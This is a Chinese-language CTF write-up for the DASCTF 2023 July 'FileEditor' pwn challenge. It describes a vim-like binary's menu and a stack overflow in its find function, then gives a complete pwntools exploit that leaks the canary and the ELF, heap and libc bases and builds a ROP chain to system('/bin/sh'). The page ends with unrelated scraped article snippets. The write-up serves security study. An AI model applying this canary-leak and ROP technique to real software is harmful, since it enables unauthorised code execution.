DASCTF 2023 & 0X401七月暑期挑战赛【PWN】(FileEditor篇)

题目保护情况(保护全家桶)

64位ida逆向

模拟了一个类似vim的功能,有打开文件,打印内容,插入行,删除行,复制行,和编辑行,还有查找字符和替换字符的功能,然后就是保存退出

一个一个来分析吧

1.open

就是打开一个file文件。没有会创建

2.show

(没有什么特别的,打印内容)

3.插入行

输入n,m,和内容,在n行前面插入m行

4.删除行

还是输入n和m,功能是在起始行m后删除n行

5.复制行

功能是复制自k行后面的m行数据给起始于n行之后的数据

6.编辑行

输入编辑的行,然后输入内容

7.查找字符

会把我们的内容先放到src上,src有0x70大小

8.替换字符

同样也是

9.保存退出

0.退出编辑

分析:可以通过查找字符或者替换字符的功能,把输入文件的内容放到栈上,输入0x68+1个字节覆盖canary末尾,然后打印的时候会顺带打印出canary,同样用这个手法,泄露出libc地址和堆地址,也可以不需要直接用libc里面的binsh字符串,最后通过编辑把ropchain写入栈上,然后查找时通过溢出劫持程序流来获取shell。

exp:

from pwn import *

context(log_level='debug',arch='amd64',os='linux')

io = process('./FileEditor')

#io = remote('node5.buuoj.cn',27825)

libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')

def open():

    io.sendlineafter('> choose:','1')

def instert(n,m,msg):

    io.sendlineafter('> choose:','3')

    io.sendlineafter('> To insert m lines before line n, please enter n m:',n)

    io.sendline(m)

    io.sendafter('> Please enter the content to be inserted in sequence:',msg)

def show():

    io.sendlineafter('> choose:','2')

def edit(num,msg):

    io.sendlineafter('> choose:','6')

    io.sendlineafter('> Please enter the line number to be modified:',num)

    io.sendafter('> Please enter the new content:',msg)

def find(string):

    io.sendlineafter('> choose:','7')

    io.sendlineafter('> Please enter the string to search for:',string)

    io.sendlineafter('> Do you want to continue searching? (y/n)','n')

#gdb.attach(io)

open()

payload = 'b'+'a'*(0x68-1)

#gdb.attach(io)

instert('1','1',payload)

io.send('\n')

find('b')

edit('1',payload)

io.send('\n')

show()

io.recvuntil('a'*103)

canary = u64(io.recv(8))-0xa

success('canary---->'+hex(canary))

payload = b'b'+b'a'*(0x68-1) + p64(canary+ord('a')) + b'c'*8

edit('1',payload)

io.send('\n')

#gdb.attach(io)

sleep(0.5)

show()

io.recvuntil('c'*8)

elf_base  = u64(io.recv(6).ljust(8,b'\x00')) - (0x59640d98850a -0x59640d987000)

success('elf_base----->'+hex(elf_base))

payload = payload = b'b'+b'a'*(0x68-1) + p64(canary+ord('a')) + b'c'*24 + b'd'*8

edit('1',payload)

io.send('\n')

sleep(0.5)

show()

io.recvuntil('d'*8)

heap = u64(io.recv(6).ljust(8,b'\x00')) -(0x5ab985b9d2a0 - 0x5ab985b9d000) + 0x96

success('heap----->'+hex(heap))

payload = b'b'+b'a'*(0x68-1) + p64(canary+ord('a')) + b'c'*48 + b'd'*8

edit('1',payload)

io.send('\n')

sleep(0.5)

#gdb.attach(io)

show()

io.recvuntil('d'*8)

libc_base = u64(io.recv(6).ljust(8,b'\x00')) - (0x796487e29d90 -  0x796487e28000) + 0x86 -0x28000

success('libc_base---->'+hex(libc_base))

pause()

pop_rdi = elf_base + 0x0000000000002ac3 #: pop rdi ; ret

pop_rsi = elf_base + 0x0000000000002ac1 #: pop rsi ; pop r15 ; ret

ret = elf_base + 0x000000000000101a #: ret

system = libc_base + libc.sym['system']# -0x28000

binsh  = libc_base + next(libc.search('/bin/sh\0'))

#payload = b'b'+b'a'*(0x68-1) + p64(canary) + b'/bin/sh\x00' + p64(ret)

#payload += p64(pop_rdi) + p64(heap + 0x15e4) + p64(system)

payload = b'b'+b'a'*(0x68-1) + p64(canary) + p64(0xdeadbeef) + p64(ret) +p64(pop_rdi) + p64(binsh) + p64(system)

#gdb.attach(io)

edit('1',payload)

io.send('\n')

sleep(0.5)

#gdb.attach(io)

find('b')

io.interactive()

DASCTF 2023 & 0X401七月暑期挑战赛【PWN】(FileEditor篇)的更多相关文章

  1. [复现]DASCTF Sept X 浙江工业大学秋季挑战赛-PWN

    hehepwn 一开始泄露stack地址,然后写入shellcode返回到shellcode执行 from pwn import * context.os = 'linux' context.log_ ...

  2. [复现]2021 DASCTF X BUUOJ 五月大联动-PWN

    [复现]2021 DASCTF X BUUOJ 五月大联动 由于我没ubuntu16就不复现第一个题了,直接第二个 正常的off by one from pwn import * context.os ...

  3. i春秋30强挑战赛pwn解题过程

    80pts: 栈溢出,gdb调试发现发送29控制eip,nx:disabled,所以布置好shellcode后getshell from pwn import * #p=process('./tc1' ...

  4. DASCTF NOV X联合出题人-PWN

    太忙了,下午4点才开始做,,剩下的以后补上 签个到 逻辑很简单两个功能的堆,一个就是申请heap.还有一个是检验如果校验通过就会得到flag 申请模块 ​ 中间0x886是个很恶心的东西,需要我们绕过 ...

  5. 周练7(ssti)

    {7*7} ->49 -> smarty {{7*'7'}} -> 49 -> twig {{7*'7'}} -> 7777777 -> jinjia2 1. [B ...

  6. TGL站长关于常见问题的回复

    问题地址: http://www.thegrouplet.com/thread-112923-1-1.html 问题: 网站配有太多的模板是否影响网站加载速度 月光答复: wp不需要删除其他的模板,不 ...

  7. jcSQL简明执行流程图

    赶着"黑色七月"的最后一天发一篇记点东西,这个月一共掉了三架飞机,我一直很害怕坐着一架人造的东西飞在几万米的高空,相比自己长出一对翅膀,前者应该要脆弱很多.这些人每个人都因为不同的 ...

  8. Python 为什么如此设计?

    大概两年半前,我萌生了要创作一个新的系列文章的想法,也就是"Python为什么",试图对 Python 的语法及特性提出"为什么"式的问题,以此加深对它的理解, ...

  9. 【pwn】DASCTF Sept 九月赛

    [pwn]DASCTF Sept 月赛 1.hehepwn 先查看保护,栈可执行,想到shellcode 这题需要注意shellcode的写法 拖入ida中分析 一直以为iso scanf不能栈溢出, ...

  10. 阿里聚安全攻防挑战赛第三题Android PwnMe解题思路

    阿里聚安全攻防挑战赛第三题Android PwnMe解题思路 大家在聚安全挑战赛正式赛第三题中,遇到android app 远程控制的题目.我们今天带你一探究竟,如何攻破这道题目. 一.题目 购物应用 ...

随机推荐

  1. Linux系统编程(十)线程池

    #include <stdio.h> #include <stdlib.h> #include <unistd.h> #include <pthread.h& ...

  2. .NET桌面程序混合开发之三:WebView2与JS的深度应用

    在 WebView2 控件中使用 JavaScript 根据需求自由扩展原生应用的能力.本文探讨如何在 WebView2 中使用 JavaScript,并列举如何使用高级 WebView2 特性和功能 ...

  3. 如何5分钟上手使用OCR

    随便打开一个Microsoft Visual Studio,新建一个WinForms项目,从下面列表中随便选择一个NET框架. net35;net40;net45;net451;net452;net4 ...

  4. 为UIView自定义Xib

    一.需求 通过Interface Builder的形式创建Xib,并将其和一个UIView的子类绑定,如何实现? 二.解决 这个问题通过搜索,有大量的答案,大概答案的代码如下: 也就是在你的子类中,在 ...

  5. 音视频-YUV数据格式

    一.YUV格式 1)kCVPixelFormatType_420YpCbCr8PlanarFullRange = 'f420' 对应YUV I420格式 2)kCVPixelFormatType_42 ...

  6. Matlab打印运行进度

      在运行matlab程序的过程中,有时候需要实时地掌握程序运行的进度,尤其对于一些耗时较长的循环操作,能够及时地输出运行进度,显得非常有必要.   打印进度条的实现方式就是不断地退格.输出.   退 ...

  7. Vue Router 4与路由管理实战

    title: Vue Router 4与路由管理实战 date: 2024/6/7 updated: 2024/6/7 excerpt: 这篇文章介绍了如何在Vue.js应用中利用Vue Router ...

  8. 小米 红米 MIUI 重新打开(开启)蓝牙耳机电量弹窗

    原本关闭了下拉通知栏,显示耳机电量的窗口.想重新开开启. 解决方法: 1.确保小爱同学开了通知权限. 2.在蓝牙-高级设置里-开启"小米快连" 3.手机是解锁状态(非锁屏),耳机需 ...

  9. Invalid revision: 3.18.1-g262b901-dirty CMake Error: CMake was unable to find a build program corresponding to "Ninja".

    一次在GitHub上找到的项目,本想编译运行下,但报如下的问题 错误一 Invalid revision: 3.18.1-g262b901-dirty 解决办法: 这是因为版本不对应,可在local. ...

  10. 增补博客 第二十三篇 python 对比Python中的列表、元组、字典、集合、字符串等之间异同

    1. 列表(List): - 异同:列表是可变(Mutable)的有序容器,使用方括号 [] 定义,可以存储任意类型的元素.可以通过索引访问和修改列表中的元素.列表支持切片操作和列表推导式. - 相同 ...